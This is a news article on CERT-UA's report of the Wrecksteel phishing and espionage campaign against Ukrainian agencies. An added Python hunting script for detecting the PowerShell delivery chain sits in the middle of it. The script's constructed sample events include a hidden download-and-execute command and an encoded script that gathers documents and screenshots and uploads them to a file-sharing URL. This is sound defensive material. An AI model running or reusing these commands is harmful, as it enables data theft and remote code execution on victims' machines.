Hackers target Ukrainian state agencies, critical infrastructure with new ‘Wrecksteel’ malware
Ukraine recorded at least three cyberattacks in March against government agencies and critical infrastructure, using a new espionage malware, Wrecksteel, delivered through phishing emails. The attackers used compromised accounts to send emails containing malicious links, then stole files and took screenshots. The activity has been ongoing since fall 2024, and most such campaigns originate from Russia. Ukraine's state railway also suffered a major attack that took its systems offline; authorities called it an act of terrorism and suggested Russian involvement. 2025-4-3 15:15:44 Author: therecord.media

Ukraine recorded at least three cyberattacks in March targeting government agencies and critical infrastructure with new spying malware.

The attacks were carried out using previously unknown malware — dubbed Wrecksteel — deployed through phishing emails, according to a report released on Thursday by Ukraine’s computer emergency response team (CERT-UA).

The hackers used compromised accounts to send messages containing links to public file-sharing services such as DropMeFiles and Google Drive. When opened, the links executed a PowerShell script, enabling attackers to extract text documents, PDFs, images, and presentations, as well as take screenshots of infected devices.
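The delivery chain in the paragraph above (a link to a public file-sharing service, a PowerShell script, collection of office documents and screenshots) is behaviour a blue team can hunt for in process-creation telemetry without knowing the specific payload. The script below is an added example for this page, not CERT-UA's or The Record's tooling; it scores constructed Sysmon-style process-creation events against generic heuristics. The hostnames dropmefiles.com and drive.google.com, the cmdlet and .NET API names, the parent-process list and the alert threshold are assumptions of the example, not published Wrecksteel indicators.

```python
"""Hunting heuristic for the delivery chain reported above: a phishing link to a
public file-sharing service that ends in a PowerShell script collecting
documents and taking screenshots.

Added illustration for this page, not CERT-UA or Recorded Future tooling.
The events below are constructed in a Sysmon Event ID 1 (process creation)
shape; hostnames, cmdlet names, file extensions and .NET API names are
generic hunting heuristics assumed here, not published Wrecksteel indicators.
"""
import base64
import re
from typing import Iterable, Optional

# Services named in the article; the exact hostnames are an assumption.
FILE_SHARE_DOMAINS = ("dropmefiles.com", "drive.google.com")
# Parents that should rarely launch PowerShell on a user workstation.
SUSPICIOUS_PARENTS = ("chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "winword.exe", "excel.exe")
# Document types the article says were collected, plus common aliases.
DOC_EXTENSIONS = (".txt", ".doc", ".docx", ".pdf", ".jpg", ".png", ".ppt", ".pptx")
DOWNLOAD_CRADLES = re.compile(
    r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|start-bitstransfer)\b|downloadstring|downloadfile",
    re.IGNORECASE,
)
SCREENSHOT_APIS = ("copyfromscreen", "system.drawing", "system.windows.forms.screen")
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: dict) -> Optional[list]:
    """Return a list of reasons for a PowerShell event, or None for other images."""
    if _basename(event["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = (cmd + " " + (decoded or "")).lower()  # scan the visible and decoded command together
    reasons = []
    parent = _basename(event.get("ParentImage", ""))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_WINDOW.search(text):
        reasons.append("hidden window")
    if any(d in text for d in FILE_SHARE_DOMAINS):
        reasons.append("file-sharing URL")
    if DOWNLOAD_CRADLES.search(text):
        reasons.append("download cradle")
    if sum(1 for ext in DOC_EXTENSIONS if ext in text) >= 2:
        reasons.append("document enumeration")
    if any(api in text for api in SCREENSHOT_APIS):
        reasons.append("screenshot API")
    return reasons


def hunt(events: Iterable[dict], threshold: int = 2) -> list:
    """Flag PowerShell events that accumulate at least `threshold` reasons."""
    findings = []
    for ev in events:
        reasons = analyse(ev)
        if reasons and len(reasons) >= threshold:
            findings.append({"ProcessId": ev["ProcessId"], "Image": ev["Image"], "reasons": reasons})
    return findings


# Constructed sample telemetry (not real logs). The encoded script mimics the
# reported behaviour: enumerate documents, grab the screen, post to a file share.
ENCODED_SCRIPT = (
    "$f = Get-ChildItem $env:USERPROFILE -Recurse -Include *.docx,*.pdf,*.pptx,*.png; "
    "Add-Type -AssemblyName System.Windows.Forms; "
    "$b = New-Object System.Drawing.Bitmap 1920,1080; "
    "[System.Drawing.Graphics]::FromImage($b).CopyFromScreen(0,0,0,0,$b.Size); "
    "Invoke-WebRequest -Uri https://drive.google.com/example -Method Post -Body $f"
)
ENCODED_BLOB = base64.b64encode(ENCODED_SCRIPT.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"ProcessId": 5532, "Image": PS, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'powershell.exe -nop -w hidden -c "iwr https://dropmefiles.com/example -OutFile $env:TEMP\update.ps1; & $env:TEMP\update.ps1"'},
    {"ProcessId": 7788, "Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc " + ENCODED_BLOB},
    {"ProcessId": 6001, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"PID {f['ProcessId']}: {', '.join(f['reasons'])}")
```

Scoring several weak signals rather than matching a single string keeps the rule useful after the operators change a hostname or a filename, and decoding `-EncodedCommand` before matching closes the most common evasion of keyword rules. In production the same logic would read Sysmon or Security 4688 events from the SIEM rather than the constructed list.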

CERT-UA, which named the hacking group UAC-0219, said the cyberespionage campaign has been active since at least the fall of 2024. 

In one incident, attackers sent phishing emails falsely claiming that a Ukrainian government agency planned to cut salaries. The email contained a malicious link purportedly leading to a list of affected employees.

While CERT-UA did not attribute the attacks to a specific country, most phishing-based espionage campaigns targeting Ukrainian government institutions originate from Russia.

Earlier this week, researchers at the cybersecurity firm Cisco Talos reported that Gamaredon, a hacking group attributed to Russian intelligence services, has been conducting an espionage campaign using malicious files referencing troop movements in Ukraine.

Ukraine’s state railway operator, Ukrzaliznytsia, suffered a major cyberattack last week that disrupted its online systems. Ukrainian cyber officials said the hackers deployed custom-built malware specifically designed for the railway’s infrastructure, suggesting the operation required significant resources and planning.

Authorities called the cyberattack on the operator, which serves millions of Ukrainians, “an act of terrorism.” 

Given the similarities between the tactics used in the operation against Ukrzaliznytsia and previous Russian-linked cyber activities, Ukraine suggested Russia was behind the campaign but did not attribute the attack to a specific hacker group.



Source: https://therecord.media/hackers-ukraine-critical-infrastructure-malware